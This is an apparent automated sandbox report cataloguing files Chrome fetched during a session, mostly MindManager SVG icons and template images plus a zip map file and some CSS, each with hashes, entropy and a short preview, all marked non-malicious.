                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/banners/banner_project_taskmanagement.svg
                                                                Preview:<svg width="650" height="180" viewBox="0 0 650 180" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_8753)">..<path d="M0 40.8984C0 35.3756 4.47715 30.8984 10 30.8984H640C645.523 30.8984 650 35.3756 650 40.8984V170.898C650 176.421 645.523 180.898 640 180.898H10C4.47715 180.898 0 176.421 0 170.898V40.8984Z" fill="#CADEF7"/>..<g clip-path="url(#clip1_456_8753)">..<path opacity="0.5" d="M416.619 132.884C413.968 109.371 424.752 86.5426 442.657 71.8747C460.561 57.2068 484.926 50.2962 509.575 50.1214C541.724 49.8935 575.977 61.6338 598.582 85.3664C621.187 109.099 629.52 145.364 614.348 171.052C607.057 183.397 593.441 193.174 577.918 191.81C562.958 190.497 549.58 179.425 534.622 177.878C507.822 175.107 487.6 201.11 459.31 191.256C436.862 183.436 418.951 153.571 416.619 132.884Z" fill="#99C3F8"/>..<path d="M596.209 22.918H440.504C433.63 22.918 428.057 28.4909 428.057 35.3654V146.572C428.057 153.446 433.63 159.019 440.504 159.019H596.209C603.083 159.019 608.656 153.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2324
                                                                Entropy (8bit):4.855589977493656
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7DB44E64A3FA25BD659500D693EFD4D7
                                                                SHA1:BEC5C5313E91F815691DF73572C984BADDF51C84
                                                                SHA-256:2C587164B7B8C22FD2E6B1660FFF2561FAA501D82943D088FCADA4DC06D7C27C
                                                                SHA-512:5A95AD1AC3BD595829E342D0B8B7A67D870F78EF4B1CA63CFE5CD6ADDD51A15A9112C959954A010F293443EBE32BCC864D3CA5D3D618F2170CFAAECC208B2F93
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/meetingnotes.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="20" y="9" width="63.8993" height="34.9638" rx="2" fill="#C4E2F9"/>.<rect x="21.2031" y="10.2051" width="61.488" height="4.82259" rx="1" fill="#627CAD"/>.<rect x="23.2051" y="19.6777" width="23.4929" height="3.20358" fill="white" fill-opacity="0.2"/>.<rect x="23.2051" y="25.0215" width="32.0358" height="3.20358" fill="white" fill-opacity="0.2"/>.<rect x="23.2051" y="30.3594" width="27.7643" height="3.20358" fill="white" fill-opacity="0.2"/>.<rect x="23.2051" y="35.6973" width="39.5108" height="3.20358" fill="white" fill-opacity="0.2"/>.<rect x="86.7637" y="9" width="63.8993" height="34.9638" rx="2" fill="#D7E3C4"/>.<rect x="87.9668" y="10.2051" width="61.488" height="4.82259" rx="1" fill="#97AA4C"/>.<rect x="89.9688" y="19.6777" width="23.4929" height="3.20358" fill="white" fill-opacity="0.2"/>.<rect x="89.9688" y="25.0215" width="32.0358" height="3.20358" fill="white" fill-opacity
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):4424
                                                                Entropy (8bit):5.007701672679021
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D40C382E6F0BA75BDDFB57770DBB0DC9
                                                                SHA1:94234FCB0A0F711BE5DE77B948C96CD397EC60F5
                                                                SHA-256:759BA4F6B8B8459C48CED07F3896127E15E75A4DC05B2784E3CADD81BB2DB209
                                                                SHA-512:E333D97FE92B67A6D2D101CE8342DF92704510FEE51D4E3F8F2E6BFFBFBB29E35DBC9372BEAB0BE142419CA1A7E10FFA1106404A5F3037188B35CA2643DD2E9E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/empathymap.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M54 3.20312C54 2.09855 54.8954 1.20312 56 1.20312H85.7136V32.9167H54V3.20312Z" fill="#FFDAD8"/>.<path d="M54 32.916H85.7136V64.6296H56C54.8954 64.6296 54 63.7342 54 62.6296V32.916Z" fill="#DCC5EC"/>.<path d="M54 69.166C54 68.0614 54.8954 67.166 56 67.166H83.7136C84.8182 67.166 85.7136 68.0614 85.7136 69.166V87.9998C85.7136 89.1044 84.8182 89.9998 83.7136 89.9998H56C54.8954 89.9998 54 89.1044 54 87.9998V69.166Z" fill="#AD85AD"/>.<path d="M85.7139 1.20312H115.427C116.532 1.20312 117.427 2.09856 117.427 3.20313V32.9167H85.7139V1.20312Z" fill="#DEE5FA"/>.<path d="M85.7139 32.916H117.427V62.6296C117.427 63.7342 116.532 64.6296 115.427 64.6296H85.7139V32.916Z" fill="#B5C4EA"/>.<path d="M85.7139 69.166C85.7139 68.0614 86.6093 67.166 87.7139 67.166H115.427C116.532 67.166 117.427 68.0614 117.427 69.166V87.9998C117.427 89.1044 116.532 89.9998 115.427 89.9998H87.7139C86.6093 89.9998 85.7139
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (1476), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):38284
                                                                Entropy (8bit):5.112021368539161
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EA3C880120D132DD7E69D07025F11CF3
                                                                SHA1:466C053FBCC498C1B6D5D57704E579C017EB34B4
                                                                SHA-256:B8FE053E02EE76DF190025778161DDCDF3C7DD888A1432C020842C1F08D77646
                                                                SHA-512:F44047DA2C8FD10F7408B1C95EFA8051FC7C3C8FBEBE1AE4AE0E2BF44F720EF7AFCEC6468809894AC8D542D28AD842651B17E277D0EB343776B0D8DBBD6C5C30
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/abjSVJqrsBlef30
                                                                Preview:@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/testweb/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/testweb/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/testweb/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/testweb/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight:
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1010
                                                                Entropy (8bit):5.13677839408092
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:09ACF8CDBC997B13AB596C970EBDC353
                                                                SHA1:00BD6EBCEEE5FB255FF0A7E3F9051DDD82BF371D
                                                                SHA-256:26FEDB210F891167631D74EE98B1DA13CA89BC0F6D39909761E458339EE3A5DB
                                                                SHA-512:0CF53DB44BCE8052DF956BCFAF5ADBF865888860D7DE45819BB79B46C7A08A603067BA56C8C32DF023D3C510ED1BEB41F3889E8EF6B6CE011C47FD86820DA9C9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_fit.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 15 15"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:none;stroke:#63a558;stroke-miterlimit:10;}.cls-4{fill:#63a558;}</style></defs><title>context_fit</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="0.5" y="0.5" width="14" height="14" rx="2.5"/><path class="cls-2" d="M12,1a2,2,0,0,1,2,2v9a2,2,0,0,1-2,2H3a2,2,0,0,1-2-2V3A2,2,0,0,1,3,1h9m0-1H3A3,3,0,0,0,0,3v9a3,3,0,0,0,3,3h9a3,3,0,0,0,3-3V3a3,3,0,0,0-3-3Z"/><line class="cls-3" x1="7.5" y1="3.37" x2="7.5" y2="11.63"/><polygon class="cls-4" points="10.23 3.73 4.77 3.73 7.5 1 10.23 3.73"/><polygon class="cls-4" points="10.23 11.27 4.77 11.27 7.5 14 10.23 11.27"/><line class="cls-3" x1="3.37" y1="7.5" x2="11.63" y2="7.5"/><polygon class="cls-4" points="3.73 4.77 3.73 10.23 1 7.5 3.73 4.77"/><polygon class="cls-4" points="11.27 4.77 11.27 10.23 14 7.5 11.27 4.77"/><rect class="cls-1" x="6" y="6" width="3" height="3"/></g>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):910
                                                                Entropy (8bit):4.959156315605101
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8620528B3F3084D4C5F59F9775111CA9
                                                                SHA1:ACA9E84CED18A944DFF30069EF47EB0D9D1F79B3
                                                                SHA-256:2577656F08541A4AEB27A5EB4ED815BD1B098671FA1FEBD1C5D7E6DACB352BC6
                                                                SHA-512:9FB456FA496FC3040E388632FF4BB289C693A29F729557566B0F569F33ECAFDB5D874E76C65A8BF219579ECDE998F02E1DCFDA02BA6CEBA1CF337969335D30EF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/remote-services/dropbox.svg
                                                                Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 48 48" version="1.1" width="50px" height="50px">.<g id="surface1">.<path style=" fill:#1E88E5;" d="M 42 13.976563 L 31.378906 7.253906 L 24 13.3125 L 35.027344 19.730469 Z "/>.<path style=" fill:#1E88E5;" d="M 6 25.648438 L 16.933594 32.054688 L 24 26.632813 L 13.527344 19.96875 Z "/>.<path style=" fill:#1E88E5;" d="M 16.933594 7.253906 L 6 14.300781 L 13.527344 19.96875 L 24 13.3125 Z "/>.<path style=" fill:#1E88E5;" d="M 24 26.632813 L 31.210938 32.054688 L 42 25.648438 L 35.027344 19.730469 Z "/>.<path style=" fill:#1E88E5;" d="M 32.195313 33.777344 L 31.046875 34.460938 L 29.980469 33.65625 L 24 29.160156 L 18.15625 33.644531 L 17.089844 34.464844 L 15.933594 33.785156 L 13 32.066406 L 13 34.738281 L 23.988281 42 L 35 34.792969 L 35 32.113281 Z "/>.</g>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):6993
                                                                Entropy (8bit):4.677614629379435
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:98A7347E7B3E820E9348A3B937E44ED0
                                                                SHA1:53F29FC84BB205653DFE89AE16965F296F7F314D
                                                                SHA-256:37E11846C714DBC9931945D03C07A616CBECEBEE20CB9DC10934022623CD7A6D
                                                                SHA-512:0B80D74175CE3BD816066B64E9F866D54250DCA9CF32D947991D156571BAC7E478DE93393A0CA1AF3566878350E4C9848B42F3D05BB6A0C33BA7A42508F4C3B7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/conceptmap.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<circle cx="85.2799" cy="29.6246" r="8.90004" fill="#FB582D" stroke="#FB582D" stroke-width="0.5"/>.<path d="M138.729 30.4803L136.823 34.1658L122.735 34.1658L120.829 30.4803L122.735 26.7949L136.823 26.7949L138.729 30.4803Z" fill="#932936"/>.<path d="M148.919 11.25L150.035 13.6324L148.919 16.0149L140.121 16.0149L139.005 13.6324L140.121 11.25L148.919 11.25Z" fill="#E0A9B3" stroke="#932936" stroke-width="0.5"/>.<path d="M162.608 25.9922L163.724 28.3746L162.608 30.7571L153.809 30.7571L152.693 28.3746L153.809 25.9922L162.608 25.9922Z" fill="#E0A9B3" stroke="#932936" stroke-width="0.5"/>.<path d="M149.972 42.8398L151.088 45.2223L149.972 47.6047L141.174 47.6047L140.058 45.2223L141.174 42.8398L149.972 42.8398Z" fill="#E0A9B3" stroke="#932936" stroke-width="0.5"/>.<path d="M42.4346 25.7422H49.1322L50.5675 28.2555V31.3622L49.1322 33.8756H42.4346H35.7361L34.3008 31.3622V28.2555L35.7361 25.7422H42.4346
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1327
                                                                Entropy (8bit):4.973441839947763
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4217181C78C2F1D500E76B66192A747E
                                                                SHA1:D803B0919BA787D3DD8E586723DE055CF4F67381
                                                                SHA-256:73C42E6AAF3276D88354ED44F7FE9CC80B92BCBB01867C5C20F6EBB4A214CFE3
                                                                SHA-512:0BBACD54E9E8C6D8C47F3DFCA050A99E7B9144F82D6D294ACF25E27A67FA18BD44E89793333E6D5BFE56DA6B54EB5B346E411FF58298AC55B7EF6C6BF57EE0F8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/freeformmap.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M22.5 4L26.878 17.4742H41.0456L29.5838 25.8017L33.9618 39.2758L22.5 30.9483L11.0382 39.2758L15.4162 25.8017L3.9544 17.4742H18.122L22.5 4Z" fill="#FFF1C5"/>.<path d="M167 18.6532L152.455 28.3426L152.455 8.9638L167 18.6532Z" fill="#E8F4FE"/>.<rect x="131.195" y="14.1797" width="28.3439" height="8.9507" fill="#E8F4FE"/>.<ellipse cx="150" cy="48.5" rx="11" ry="10.5" fill="#FFC3B9"/>.<g opacity="0.4">.<path d="M113.873 56.7761C113.873 64.2378 104.839 70.2866 92.0818 70.2866C79.3248 70.2866 67.6758 64.2378 67.6758 56.7761C67.6758 49.3145 78.0174 43.2656 90.7744 43.2656C103.531 43.2656 113.873 49.3145 113.873 56.7761Z" fill="#737373"/>.<path d="M87.7232 74.6465L87.7234 65.93H77.2637L87.7232 74.6465Z" fill="#737373"/>.<ellipse cx="89.2414" cy="56.2835" rx="20.6945" ry="12.1468" fill="white"/>.<path d="M85.6413 72.0273L85.6415 65.729H78.4434L85.6413 72.0273Z" fill="white"/>.</g>.<rect x="1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                Category:downloaded
                                                                Size (bytes):12203
                                                                Entropy (8bit):7.9637131857106995
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:891C29F00FDA0808B616FC3775907AC7
                                                                SHA1:C3A94F5ADC28EA90E29BDF5959107E4224434744
                                                                SHA-256:CF048E65CAB1CF1460AA844BD72B4B42138964A8A997D7C8F48D6B6778B69C28
                                                                SHA-512:9148B58B87CDD786DDEAD82B53AB80AA8B11CB8CB0612AF1D059A4E4D36758AB78F0567A833CC125715B87467B6D4BA990351220BC4F5F00EF4706914D2AB69B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://us.sharing.mindmanager.com/cbiQb7SDgu5zNdFUqzqQ
                                                                Preview:PK.........^.X................Document.xmlMJHI.]iw...+,.v....@...r6.F.O.(.T"..1...?.;..u....@...k..+5..~jW...^U.x..%..e....j.....23.....a.@...k.2.....?.q.....j......m....%N....*k.3.....Z.w.h`..\Y7a.&.|.l...;.....m..Z..X,..|V7'...{h5{n....aPKR...@..~......2.Ge...t.1GMv.B.Y...h9.V......u.m.B.F...o.".]!.9..a(.W......V....k>.\.....V.C.x..2....6.e.u...$...#C..L..!...u.@.dE...mf.....E.&S..7s.eKe..D7eh]fl...>|..`......."C..[..K....8.?C..J.%k....._..m.e...M{.Ho.....q.- k}.E.mJ...g7.P.<..}.T`.5YQ.zY.$.....n...].......ZTp..L..=E....j`.@...O...k...t.r.._..`.....5...\]k..a.n..t..):....=./Q....=_m...........m...n.A._.......(X...r..!.B.%Kc....I.u..*#.F.H.`...K.w..,=...m.OXY..b..*Y"G(..F.........|.u.hIW.@8W6@..23.....hh."c...lS.A{.F?...h.9....c...W~......@r...@.|.E..s6.$M....y.b9./.$...7..$...K...1...\.lY.-ou......|.`.;6Q._.t/K6"..@2l..Sl......p...g....MrL..9.PXq%...._...F..].X..<L^.x.w*.}.%.U............*.Q.....c$....i..i.y...(.....H...O;h2K.Hq..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1654
                                                                Entropy (8bit):4.778368088570298
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5EB4BC4FDF40C0A0D46CD9931FD09B0E
                                                                SHA1:0D24169FE42FFF052B6E904DB113649883210DE9
                                                                SHA-256:393147212E93BC79C3C7FE00E7FE07FADEAB203693DD5337869E9D3CE6AD0749
                                                                SHA-512:FFA1F1A3EF3BD95F0F59CF43754BB9827676E1B166E360E40A189E520D6D7786C5113E3960AE8CA1612225B34A065DCF4326244689F10DCFFF33BBCAE4EEA98F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/overlay-panel/co-edit-disconnected.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 19.9 17"><defs><style>.cls-1{fill:#ea969d;}.cls-2{fill:#c1272d;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><circle class="cls-1" cx="11.5" cy="3.5" r="2.92"/><path class="cls-2" d="M11.5,1.17A2.33,2.33,0,1,1,9.17,3.5,2.33,2.33,0,0,1,11.5,1.17M11.5,0A3.5,3.5,0,1,0,15,3.5,3.5,3.5,0,0,0,11.5,0Z"/><path class="cls-1" d="M4.58,15.42C4.65,10.06,6.42,7.19,10,6.7l.26.2C6.63,7.28,4.93,9.82,4.71,15l0,.45Z"/><path class="cls-2" d="M11.89,5.83a.24.24,0,0,0-.25.19c.52,0,.42-.19.25-.19ZM11.64,6l-.45,0C6.61,6,4,9.05,4,15.7V16H7V15H5.29c.24-5.56,2.18-7.56,5.9-7.56.53,0,.41-.23.15-.44h-.5c-.28-.25-.3-.35-.2-.35a1.73,1.73,0,0,1,.7.35h.75c-.4-.51-.49-.81-.45-1Z"/><circle class="cls-1" cx="3.5" cy="3.5" r="1.92"/><path class="cls-2" d="M3.5,2.17A1.33,1.33,0,1,1,2.17,3.5,1.32,1.32,0,0,1,3.5,2.17M3.5,1A2.5,2.5,0,1,0,6,3.5,2.5,2.5,0,0,0,3.5,1Z"/><path class="cls-2" d="M1.38,9c0-2.34.83-3.5,2.45-3.5a2.5,2.5,0,0,
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):751
                                                                Entropy (8bit):5.316569623649916
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2FBABCDAE51CED68B6ACE3E86603E698
                                                                SHA1:AF48B069A49FBE1DBF08E69FB55050973FB7AA56
                                                                SHA-256:9DA07BE32FB92A0F59F47A3A3DD28162D48237024CB250C9BD167588318F2C9E
                                                                SHA-512:ED70570D183ED140B0E4683E25DF0B836EDED84E7465C8C5CE4434DDB4E68DD4451FE862A58F03A08772A0A0DC51561CF326FDAFF73BBC8E515BCCE17529D80A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/arrow-right.svg
                                                                Preview:<?xml version="1.0" ?><!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN' 'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'>.<svg enable-background="new 0 0 32 32" height="32px" version="1.1" viewBox="0 0 32 32" width="32px" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <path clip-rule="evenodd" d="M32,16.009c0-0.267-0.11-0.522-0.293-0.714 l-9.899-9.999c-0.391-0.395-1.024-0.394-1.414,0c-0.391,0.394-0.391,1.034,0,1.428l8.193,8.275H1c-0.552,0-1,0.452-1,1.01 s0.448,1.01,1,1.01h27.586l-8.192,8.275c-0.391,0.394-0.39,1.034,0,1.428c0.391,0.394,1.024,0.394,1.414,0l9.899-9.999 C31.894,16.534,31.997,16.274,32,16.009z" fill="#ffffff" stroke-width="1" stroke="#ffffff" fill-rule="evenodd"/>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):319
                                                                Entropy (8bit):5.195699885890882
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8B52AFB5E3AC6EB3AAACACB614044D2A
                                                                SHA1:146DEA5D32184003408000FD5479E5B2352524FE
                                                                SHA-256:29031575023BBDB1D44AAD019D19F4854264FF2AB1741ED6291D23B1FA22191E
                                                                SHA-512:367C9D424B2DA94B07E9C5C8A6E1EC2F2D1B84FE8D287FEFCB84729F0E16030D40C5B98135C71862E13B6BAC30764B03FE37D98DFBACE2FB078E2EF75E0AEAA8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/design/top-menu-text.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 13.6 14.22"><title>top-menu-text</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path d="M0,13l1.05-.15L6,0H7.68l4.88,12.84,1,.15v1.23H9.52V13l1.08-.19-.94-2.61H4L3,12.8,4.07,13v1.23H0ZM4.56,8.57H9.07l-2.2-6.1H6.81Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):3430
                                                                Entropy (8bit):4.946715225255947
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:146DC21796773F2A583B1AB7C4739F77
                                                                SHA1:36BDA70B4D6CAF2999671073A94370925F8770A7
                                                                SHA-256:D5D999323AB585607D9A64EA1E67D93110984539D3BB77E33950017297F875A8
                                                                SHA-512:5148181874700431AFE4DAA5C4AF1F097F84D232A187DACA3A9DDF4AAFF244B45F07FC68DC0427EE91AF2348DD18ED38283F87326C0A2FC8A12C9856099305A4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/eisenhowermatrix.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M49.4883 7.90078H86.5909C87.0879 7.90078 87.4909 8.30373 87.4909 8.80078V46.9034C87.4909 47.4004 87.0879 47.8034 86.5909 47.8034H48.4883C47.9912 47.8034 47.5883 47.4004 47.5883 46.9034V9.80078C47.5883 8.75144 48.4389 7.90078 49.4883 7.90078Z" fill="#EF4B1F" stroke="white" stroke-width="0.2"/>.<path d="M48.4883 47.9965H86.5909C87.0879 47.9965 87.4909 48.3994 87.4909 48.8965V86.9991C87.4909 87.4961 87.0879 87.8991 86.5909 87.8991H49.4883C48.4389 87.8991 47.5883 87.0484 47.5883 85.9991V48.8965C47.5883 48.3994 47.9912 47.9965 48.4883 47.9965Z" fill="#FFDB67" stroke="white" stroke-width="0.2"/>.<path d="M88.5898 7.90078H125.692C126.742 7.90078 127.592 8.75144 127.592 9.80078V46.9034C127.592 47.4004 127.189 47.8034 126.692 47.8034H88.5898C88.0928 47.8034 87.6898 47.4004 87.6898 46.9034V8.80078C87.6898 8.30373 88.0928 7.90078 88.5898 7.90078Z" fill="#FCCCBC" stroke="white" stroke-width="
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):313
                                                                Entropy (8bit):5.0953655654553405
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0AF81D5590BFA077278BA11D9AB21541
                                                                SHA1:A4EAD329477295290769F4BE60F0EC5020C96984
                                                                SHA-256:9E61A2A33AFBB21DB35E129CDEB326F7671D361522ED63895A7958B9C4290D71
                                                                SHA-512:D42A67AD6C178071367E46C4934599982A972E963D7959E63CE24D2881C9B3B9AE4460D3407977550584F3536C184897988F59C142F2501492D608EE822EF424
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/horizontal-divider.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 1"><defs><style>.cls-1{fill:none;stroke:gray;stroke-miterlimit:10;}</style></defs><title>background_shape_Asset 76</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><line class="cls-1" y1="0.5" x2="16" y2="0.5"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                Category:dropped
                                                                Size (bytes):1150
                                                                Entropy (8bit):4.33629993867097
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DA07350087067F329D1E24BBDD3CE7CF
                                                                SHA1:A67417C2F1C8FF09712AE01C007DFA3C0FB1D181
                                                                SHA-256:FDC1B00B9CABC2FB9096021FF015C16BA582C4348D52C025654BCFDC21722984
                                                                SHA-512:9A3CD9564A364BFDFA2EF9AD089D9D690F0F723E4DFFF0F9E1458BBB78E5958F1109C50B37E51D2610ADB43D17CA5021EFD18836CD36D8F22E7D1DF1236D8EEC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:............ .h.......(....... ..... ...........................................................................................N...N...N...F...d...9.................t...G...M...N...N...N...N...N...K...L...~.....q..e......[...F...N...N...N...N...N...N...N...C...g...............w...G...M...N...N...N.N...N...N...N...I...N...............^...D...N...N...N...N.N...N...N...N...N...C...k.........|...I...L...N...N...N...N.N...N...N...N...N...H...R.........d...D...N...N...N...N...N.N...N...N...N...N...N...D...u......L...K...N...N...N...N...N.N...N...N...N...N...N...G...^...i...F...O...N...N...N...N...N.N...N...N...N...N...N...N...L..J...N...N...N...N...N...N...N.N...N...N...N...N...N...N...NV..M...N...N...N...N...N...N...N.N...N...N...N...N...N...P.S...Q...N...N...N...N...N...N...N.N...N...N...N...N...O...Lf..K...O...P...N...N...N...N...N...N.N...N...N...N...P...M.?...<...M...R...O...N...N...N...N...N...N{..N..N..N..Q..HR..<...?...M...R...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):338
                                                                Entropy (8bit):5.14807274638626
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2AFFF6B21A36FB07EEA194683C5D9713
                                                                SHA1:1743A34E8EECE7E58A1AD78108A4FCFD47130C22
                                                                SHA-256:42A63A0648AA33A7EEA6CB2B5658FF0C3C14279014FE8BA1A8FF34B05FE8A2C5
                                                                SHA-512:FB3785106E17D7DAC8130C704717226A85A4BE1A6E2A307B79CC3A785B68EBB1097C22113DAEA9B28DC928F084CBB3977D81EFAF99F581F912DB8DEA9981FED6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/percentageDoneNone.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#efefef;}.cls-2{fill:#a3a3a3;}</style></defs><title>percentageDoneNone</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):3.990210155325004
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):449
                                                                Entropy (8bit):5.204189356199045
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BB956E7F1B0D2E268036F58AD94D4E0E
